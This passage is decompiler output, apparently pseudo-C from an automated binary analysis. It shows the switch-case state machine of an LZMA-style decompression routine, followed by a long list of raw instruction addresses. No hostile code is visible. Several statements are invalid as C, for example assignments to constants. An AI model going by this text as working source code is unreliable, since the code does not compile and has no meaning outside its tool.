												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                0x00000000
                0x0040638c
                0x0040638c
                0x00406390
                0x004063b9
                0x004063c3
                0x00406392
                0x0040639b
                0x004063a8
                0x004063ab
                0x004066ef
                0x004066ef
                0x004066f2
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00406740
                0x00406744
                0x004068f3
                0x00406909
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00406925
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x0040676b
                0x0040676b
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00000000
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x004066ef
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f3
                0x00000000
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x004060ec
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x00000000
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
